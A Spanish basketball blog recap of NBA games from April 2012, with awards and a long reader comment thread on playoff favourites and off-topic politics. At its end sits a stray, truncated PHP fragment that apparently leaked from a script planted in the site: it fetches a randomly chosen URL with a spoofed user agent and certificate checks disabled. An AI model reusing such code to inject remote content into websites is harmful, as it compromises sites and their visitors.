La Crónica: Aluvión de triples en el Madison Square Garden

18 de April de 2012 por TheDeerHunter

Jornada decisiva para los Knicks, que ponen pie y medio en postemporada con su victoria ante Boston (100-118). No están demasiado acostumbrados a vibrar así en el Madison y ante los máximos rivales históricos nada menos. Brillante triple doble de un Carmelo Anthony más generoso que nunca. Más mérito si cabe por lograrlo en un cara a cara con un Paul Pierce grandioso que nunca dio su brazo a torcer. El duelo global de triples fue asombroso: 11 de 21 de los verdes (y eso que no estaba Ray Allen) frente al 19 de 32 de los locales. JR Smith, 7 de 10 y Steve Novak, 8 de 10. Ya lo firmaban para alguno de los choques de primera ronda. De esta manera los Knicks amasan tres victorias de ventaja y salvo catástrofe serán séptimos, lo que significará un previsible cruce contra Miami, pero recuperando piezas. Al nivel de anoche se puede soñar.

Por su parte, los Sixers aguantan cada día más desinflados. Al menos pudieron plantar cara a unos interesantes Pacers inmersos en una gran racha victoriosa (102-97). Excelente Granger, que parece haber recuperado el toque, buen nivel de titulares y también del banquillo. Los Sixers llevan 3 derrotas consecutivas, pero se mantienen partido y medio sobre Bucks.

En el Oeste, vendetta de los Spurs en el Staples (112-91). Parker se merendó a Sessions en una de sus peores actuaciones desde que llegó a LA. El choque, por otro lado, era únicamente trascendente para definir los cruces. San Antonio está ahora más cerca de la primera plaza (con la lotería de quién será 8º) y los Lakers más cerca de perder la 3ª, que supondría una primera ronda contra Memphis. Precisamente los Grizzlies doblegaban sin problemas a los Wolves en la vuelta de Marc (91-84) con un Rudy Gay en envidiable estado de forma, pero un banco algo más flojo que en otras ocasiones. Por los Wolves sólo funcionó Barea.

Por último, palizón de Pistons a Cavs (77-116). Brandon Knight ha arrancado algo tarde, de otra forma podríamos estar incluyéndolo en ciertas quinielas.

PREMIOS

MVP: Desde que se fuera Mike D’Antoni, Carmelo Anthony es otro. Anoche consiguió el segundo triple doble de su carrera al anotar 35 puntos, capturar 12 rebotes y repartir 10 asistencias. Por su parte, Tony Parker dejó a los Lakers de vuelta y media con sus 29 puntos y 13 asistencias.

Rookie: ¡Vaya final de temporada se está cascando Brandon Knight! Ayer sólo falló uno de los 12 lanzamientos que intentó y anotó 28 puntos. Además repartió 7 asistencias.

Sorpresa: Festival anotador en los Knicks. JR Smith y Steve Novak se fueron a los 25 puntos con un 15 de 20 en triples entre ambos. El ex de los Nuggets anotó los 7 triples que intentó en la primera parte, igualando el récord de la franquicia. En Minnesota, JJ Barea emerge como el líder de su equipo en estos últimos compases de la temporada. Anoche anotó 28 puntos y repartió 8 asistencias.

Decepción: Al final del tercer cuarto el resultado del Cavs-Pistons era 50-100. La NBA tiene un problema con los equipos que se dejan llevar descaradamente buscando una buena elección del draft.

Esfuerzo en vano: Los 43 puntos de Paul Pierce no sirvieron de nada ante el aluvión de triples que les cayó encima a los Celtics y el gran partido de Carmelo. Los 23 puntos, 6 rebotes y 7 asistencias de Andre Iguodala también se quedaron sin recompensa.

Imágenes | AP Photos / Getty Images

Comenta

29 comentarios a esta entrada

  1. Vader dice:
    #1

    Vaya nivelón que esta mostrando Melo desde el cambio de entrenador. Este jugador si justifica el traspaso hecho. Es una delicia como penetra y como se crea sus opciones posteando. Ademas asistiendo muy bien, reboteando y defendiendo… Jugón!!!

      Citar

  2. Uno cualquiera dice:
    #2

    O Vader está incluyendo publicidad subliminal en sus mensajes o se ha colado…

      Citar

  3. Vader dice:
    #3

    Por favor importante borrad mi último mensaje!!!

    Se me ha colado un copy paste del iphone con el tlf de un contacto de mi agenda…

    Perdonad las molestias 😉

      Citar

  4. Vader dice:
    #4

    Uno cualquiera:
    O Vader está incluyendo publicidad subliminal en sus mensajes o se ha colado…

    Jajaja lo segundo XD

      Citar

  5. Denise dice:
    #5

    El que va a tener trabajo durante la serie Miami-New York va a ser el fontanero de Melo. Las tuberias del water van a estar colapsadas. No digo que Miami vaya a emplaizar a NY, porque éstos ultimos tienen mejor plantilla global, pero Lebron va a comerse a Melo.

      Citar

  6. melo15 dice:
    #6

    Es verdad que Lebron es mejor que Melo, y que probablemente los Heat ganen la serie, pero en caso de que Melo se enfrente a Lebron, no va a ser paliza ni mucho menos. Siempre que Melo se ha enfrentado directamente a Lebron, ha jugado mucho mas concentrado y a un super nivel, ademas aun hay posibilidades de que los Knicks queden 6 o los Heat primeros.

      Citar

  7. Vader dice:
    #7

    Denise:
    El que va a tener trabajo durante la serie Miami-New York va a ser el fontanero de Melo. Las tuberias del water van a estar colapsadas. No digo que Miami vaya a emplaizar a NY, porque éstos ultimos tienen mejor plantilla global, pero Lebron va a comerse a Melo.

    Visto lo visto las últimas semanas veremos quien se come a quien a nivel individual. Ahora mismo Melo esta superlativo.

    Gracias por arreglar mi gazapo 😉

      Citar

  8. Alfredo dice:
    #8

    Sera el ultimo anillo de Duncan este de 2012??? Ahí lo dejo….

      Citar

  9. Denise dice:
    #9

    No sé, yo creo que la eliminatoria va a estar mas igualada que el emparejamiento Lebron-Melo. Creo que la clave para que los Knicks eliminen a los Heat no es que Melo meta 40 puntos con buenos % si no que Novak, JR, Baron, Shumpert y demas gente rinda a buen nivel

      Citar

  10. Tobal dice:
    #10

    Ojo con los Spurs,yo les veo muy favoritos para ganar el anillo,Tony Parker,Duncan y Ginobilli,están en buen momento y seguro que quieren ganar otro campeonato,antes de la retirada,están en plan arrollador y atacando y defendiendo bién.¿ Vosotros como los veis ?

      Citar

  11. nba dice:
    #11

    No se, dependera de contra quien se enfrenten en playoffs, porque a mi en el Oeste quien me da miedo son los Grizllies

      Citar

  12. melo15 dice:
    #12

    Yo veo muy favoritos a los Spurs, pero a mi me generan algunas dudas ya que el año pasado tambien hicieron una regular esplendida y en playoffs…

      Citar

  13. Sancho88 dice:
    #13

    melo15:
    Yo veo muy favoritos a los Spurs, pero a mi me generan algunas dudas ya que el año pasado tambien hicieron una regular esplendida y en playoffs…

    Bueno, el año pasado tenían mucha menos profundidad de banquillo, y parece que este año tienen la plantilla más completa y profunda de toda la liga. La vuelta al equipo de Stephen Jackson les está dando un nivel de anotación impresionante, promediando más de 100 todos los partidos, y luego hay jugadores como Neal, Green, Leonard… más Ginobili y Tiago… más Parker y Duncan… e incluso Diaw… es un equipo durísimo, que ha arropado muy bien a sus tres estrellas, y que nadie dude de que Duncan querrá su quinto anillo para poner el broche a una carrera superlativa. Creo que este año el título estará muy disputado, con al menos 5 equipos con posibilidades serias de lograrlo. Para mí, y por este orden, estos son los favoritos actualmente:
    1º Chicago Bulls
    2º Oklahoma City Thunder
    3º Miami Heat
    4º San Antonio Spurs
    5º Los Ángeles Lakers

    Y ojo que también los Clippers están bien, los Celtics siguen siendo durísimos se enfrenten contra quien se enfrenten, y Grizzlies van de tapado. Lo dicho, no hay un favorito por encima de nadie ahora mismo, ni siquiera los Heat visto lo visto, y creo que viviremos unas series finales de las más bonitas de ver en la última década

      Citar

  14. Denise dice:
    #14

    Mi orden de favoritos al titulo:

    1- Miami
    2- Chicago
    3- Oklahoma
    4- Lakers (gracias al vergonzoso traspaso de Sessions)
    5- Memphis
    6- Spurs

    De todos estos equipos, preferiria una final Bulls vs Grizzlies y que el anillo se lo llevasen los Ositos.

      Citar

  15. Lucho dice:
    #15

    Hoy se juegan 14 partidos, recuerdan si alguna vez se han jugado 15? Y 14, cuando fue la vez anterior tienen idea??
    Lo que m llamo la atencion es q estan jugando 14 equipos de cada conferencia (se quedaron arafue los Pacers y los Wolves) y son todos duelos internos, no hay ninguno interconferencia.

    PD. Me esta gustando mucho Bradley, cada vez juega mejor. Y Stiemsma tambien promete, otro equipo que saca petroleo de sus altas elecciones de draft (Popovich ya no estas solo)

      Citar

  16. Sancho88 dice:
    #16

    Stiemsma es un gran luchador defensivo, que impresiona por tener un gran físico a pesar de no ser un jugador negro. Es una maravilla en ese aspecto. Bradley tiene mucho talento ofensivo, aunque debe mejorar en sus pases. Está teniendo unos porcentajes increíbles. Aún así, se les queda corto el banquillo a los Celtics, pero creo que si terminan bien la regular y se cruzan con equipos como Indiana, Orlando o Atlanta, y consiguen eludir a Bulls y Heat, éstos son hombres muertos. Darán guerra hasta el final. Por cierto, flpante lo de Howard diciendo que no juega más para Van Gundy. Ok, que se vaya a Brooklyn con Deron y elijan entrenador entre los dos… Qué dos grandes GILIPOLLAS!! Me parece una actitud de mierda, porque SVG a mí me parece un gran entrenador. Se le podrá tachar de parar los partidos con mil tiempos muertos, por ser muy exigente defensivamente, etc. pero ha demostrado que puede guiar a este equipo. La verdad es que a toro pasado todos somos manolete, pero qué gran paz les habría dado a los Magic sacar un traspaso por él… supongo que no encontraron nada interesante, pero la situación ahora es muy difícil, porque o echas a Van Gundy, o este tío no juega más. Ok, está en su derecho, pero yo creo que en casos de estos los jugadores no deberían cobrar ni un céntimo. Sabéis si el nuevo convenio dice algo sobre esto? Me parece una vergüenza… encima a 10 días de playoffs… menubo imbécil Howard…

      Citar

  17. Sancho88 dice:
    #17

    Por cierto, los Bucks se hunden definitivamente. Ya están a 2 juegos y medio de los Sixers… lo tienen muy muy jodido. Además, Rockets también se hunden, y Jazz se meten en la pomada.

      Citar

  18. Sancho88 dice:
    #18

    Pau lleva 20-9-9 en 28 minutos en pista. Es decir, según mis cálculos, ha debido colaborar en al menos 38 puntos de su equipo… y eso significa que solo en 11 canastas de su equipo con él en cancha, él no ha dado la asistencia o no la ha metido personalmente. Lo he mirado. Aún queda 1 minuto del tercer cuarto, y el triple doble (creo que sería su primero en la temporada) está a punto de caramelo… qué pedazo de crack, por dios…

      Citar

  19. Sancho88 dice:
    #19

    Ah, y Lucho también eres argentino no? que no te he nombrado, y bueno, al resto de lectores también un fuerte abrazo, jaajaja, joder que loco que estoy…

    Pau 20-11-11 en 30 minutos… supongo que le daréis el MVP no?

      Citar

  20. Sancho88 dice:
    #20

    Y que se entienda el comentario 19, es porque previamente había comentado algo sobre mis Kings y lo boludos que son, así como insultos varios proferidos con el léxico argentino, y después aproveché para saludar a Esteban, Germán y Simón, que creo que seguís el blog desde Argentina. Coño de la madre, un saludo enorme para ARGENTINA!! y que sepáis que una gran parte del pueblo español apoya deliberadamente la expropiación de YPF, por lo menos, yo os apoyo, y me considero una gran representación del pueblo español. Saludos hermanos!!

      Citar

  21. Sancho88 dice:
    #21

    Vale, finalmente y si no me fallan las cuentas, los números de Pau son: 22-11-11 en 35 minutos, y sin participar en un total de 14 canastas. Creo que no soy nada ventajista si digo que desde la ausencia de Kobe el equipo es mucho más solidario, el balón circula más, y podemos gozar de maravillas como lo que ha hecho hoy Pau, o de bestialidades de Bynum en la zona, demostrando un nivel similar al del mejor Shaquille y Olajuwon. Y no, estoy completamente sereno. Los números de Bynum son de gran pívot. Si se consolida en estos números, creo que en breve será mejor que Howard

      Citar

  22. simon dice:
    #22

    Ehhh Sanchoo!! yo no soy argentino! yo soy español! murciano!

      Citar

  23. Vader dice:
    #23

    @Sancho88

    Yo he dudado de tu serenidad con tu valoracion de YPF. A mi el tema me da igual, y a la mayoria de españoles supongo que da igual, es una empresa privada…

    Los verdaderos y únicos perjudicados seran los argentinos con todo este tema. Argentina necesita inversion exterior, española o de donde sea… Y con estas medidas se espanta esa inversion.

    Los únicos que salen ganando son los gobernantes argentinos que se quedaran el dinero, de momento la familia Eskenazi, amigos intimos de los Kishner, ya tienen el 25% de Repsol, ahora se repartiran el resto del pastel. Que pena para Argentina tener esos políticos, el único que parece sensato es Macri… Que curiosamente viene del futbol,
    el mundo al reves…

    Y cierro el offtopic, saludos

      Citar

  24. Sancho88 dice:
    #24

    Disculpas Simón, me equivoqué pues. Buena gente por Murcia. Viva Buyas!! xd

      Citar

  25. Txusma dice:
    #25

    Y que quede cerrado, no sea q algo totalmente ajeno al baloncesto enturbie el buen ambiente del blog.

    Solo se permiten enfados cuando se hable de Jameer Nelson o Allen Iverson 😀

      Citar

  26. Sancho88 dice:
    #26

    Pido disculpas si alguien se ha ofendido por mi comentario. Prometo moderarme a partir de ahora. Como diría un señor hace poco en la tele, no volverá a ocurrir, ejejeje

      Citar

  27. Vader dice:
    #27

    Sancho88:
    Pido disculpas si alguien se ha ofendido por mi comentario. Prometo moderarme a partir de ahora. Como diría un señor hace poco en la tele, no volverá a ocurrir, ejejeje

    Jajaja muy bueno XD

    Yo sólo me enfado cuando os meteis con los Knicks XD

      Citar

  28. simon dice:
    #28

    Sancho88:
    Disculpas Simón, me equivoqué pues. Buena gente por Murcia. Viva Buyas!! xd

    uyyy!! Bullas está a 20 Km de mi pueblo.

      Citar

  29. Lucho dice:
    #29

    Si Sancho, soy argentino, estas acertado! jaja. Muchas gracias por acordarte de nosotros 😀 !! Yo, por mi parte, entre ustedes, axel torres, segurola, o ultimatenba, creo que sigo mas paginas españolas que de mi propio pais jaja.
    Me gustaron tus descripciones sobre Bradley y Stiemsma. No suelo comentar todos los dias, pero si que los leo diariamente

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>